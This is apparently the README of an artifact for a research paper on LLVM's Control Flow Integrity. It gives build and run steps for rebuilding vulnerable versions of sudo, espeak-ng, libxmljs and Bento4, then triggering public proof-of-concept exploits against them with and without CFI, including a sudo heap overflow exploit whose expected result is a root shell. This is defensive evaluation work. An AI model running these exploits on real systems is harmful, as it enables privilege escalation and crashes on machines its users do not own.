SoK: Preventing Real-World Exploits: A Practical Guideline and Taxonomy to LLVM's Control Flow Integrity
Access artifacts via the following OSF link.
All containers are created using podman, however, it is also possible to use them with Docker.
The installation instructions for podman can be found here and for Docker here or here.
For each CVE we have a separate container which was exported into a .tar file and can be found in the different folders respectively.
They can be imported and used by:
# Restore container as a new image
podman import <container>.tar <your_image>
# Run and enter the container
podman run -it --name <your_container_name> --user exploit <your_image>
# Start and enter the container if it is already created
podman start <your_container_name>
podman exec -it --user exploit <your_container_name> /bin/bash
For Docker the commands are the same just podman needs to be replaced with docker.
How to trigger the PoCs/expoits with and without CFI is described within the directory of the CVEs.
Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character [NVD].
sudo apt-get install clang lld make
git clone https://github.com/sudo-project/sudo.git
cd sudo
git checkout tags/SUDO_1_8_21p2
./configure CC=clang
make
./conf_sudo <absolut/path/to/sudo/directory>
git clone https://github.com/CptGibbon/CVE-2021-3156
cd CVE-2021-3156
sed -i 's#/usr/bin/sudoedit#/home/exploit/sudo/src/.libs/sudoedit#g' exploit.c
make
./exploit
Expected output (root shell): #
./configure CC=clang CXX=clang++ \
CFLAGS='-flto -fvisibility=hidden -fsanitize=cfi-icall -fno-sanitize-trap=cfi-icall' \
CXXFLAGS='-flto -fvisibility=hidden -fsanitize=cfi-icall -fno-sanitize-trap=cfi-icall' \
LDFLAGS='-flto -fvisibility=hidden -fsanitize=cfi-icall -fuse-ld=lld -fno-sanitize-trap=cfi-icall'
make
Configure the new sudo to make it executable
../conf_sudo /home/exploit/cfi_icall/
make <cfi-variant>
./<cfi-variant>_exploit
Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c [NVD, Offical issue].
1. Get source code and build (Official build instructions)
git clone https://github.com/espeak-ng/espeak-ng.git
sudo apt-get install \
make autoconf automake libtool pkg-config \
gcc g++ clang \
libsonic-dev ronn kramdown \
libpcaudio-dev
In ./src/libespeak-ng/wavegen.c change int samplerate = 0; to extern int samplerate;
./autogen.sh
CC=clang CFLAGS=-Wextra ./configure --prefix=/usr
make
git clone https://github.com/SEU-SSL/Poc.git
export ESPEAK_DATA_PATH=/home/exploit/espeak-ng/espeak-ng-data
/home/exploit/check_espeak-ng/src/espeak-ng \
-f /home/exploit/Poc/espeak-ng/id_000000,sig_08,src_003156+002428,op_splice,rep_32 \
-w /dev/null
The expected output without protection is: Floating point exception (core dumped)[source]
Replace cfi-unrelated-cast with the CFI variant to test.
CC=clang CXX=clang++ \
CFLAGS="-Wextra -fsanitize=cfi-icall -fvisibility=hidden -flto=thin -fno-sanitize-trap=cfi-icall" \
CXXFLAGS="-fsanitize=cfi-icall -fvisibility=hidden -flto=thin -fno-sanitize-trap=cfi-icall" \
LDFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-icall -fuse-ld=lld -Wl,--allow-multiple-definition -fno-sanitize-trap=cfi-icall" \
./configure --prefix=/usr
ESPEAK_DATA_PATH=/home/exploit/cfi_icall/espeak-ng-data \
/home/exploit/cfi_icall/src/espeak-ng \
-f /home/exploit/Poc/espeak-ng/id_000000,sig_08,src_003156+002428,op_splice,rep_32 \
-w /dev/null
libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking a function on the result of attrs() that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled) [NVD].
npm run build
"configure": "cd vendor/libxml2.config && cmake configure ../libxml2 && cd ../.."
cd vendor/libxml2.config
add #define LIBXML_EXPR_ENABLED 1 to config.h
change "build": "node-gyp rebuild -j max"
to "build": "node-gyp rebuild -j max && npm run tsc"
CC=clang CXX=clang++ CFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-nvcall -fno-sanitize-trap=cfi-nvcall" CXXFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-nvcall -fno-sanitize-trap=cfi-nvcall" LDFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-nvcall -fuse-ld=lld -fno-sanitize-trap=cfi-nvcall" npm run build
mv build/Release/obj.target/xmljs.node build/Release/
./node/out/Release/node exploit.js
Expected output: Segmentation fault (core dumped)
A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_LinearReader::Advance of the file Ap4LinearReader.cpp of the component mp42ts. The manipulation leads to use after free. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-212006 is the identifier assigned to this vulnerability[NVD].
git clone https://github.com/axiomatic-systems/Bento4
cd Bento4
mkdir check_build && cd check_build
cmake ../ -DCMAKE_C_COMPILER=clang DCMAKE_CXX_COMPILER=clang++ -DCMAKE_BUILD_TYPE=Release`*
make -j
wget https://github.com/axiomatic-systems/Bento4/files/9744391/mp42ts_poc.zip
unzip mp42ts_poc.zip
/home/exploit/Bento4/check_build/mp42ts /home/exploit/mp42ts_poc /dev/null
Expected output:
free(): double free detected in tcache 2
Aborted (core dumped)
sudo apt-get install llvm-10-tools
cmake ../ \
-DCMAKE_C_COMPILER=clang \
-DCMAKE_CXX_COMPILER=clang++ \
-DCMAKE_C_FLAGS="-fsanitize=cfi-icall -fvisibility=hidden -flto=thin" \
-DCMAKE_CXX_FLAGS="-fsanitize=cfi-icall -fvisibility=hidden -flto=thin" \
-DCMAKE_EXE_LINKER_FLAGS="-flto -fvisibility=hidden -fsanitize=cfi-icall -fuse-ld=lld" \
-DCMAKE_BUILD_TYPE=Release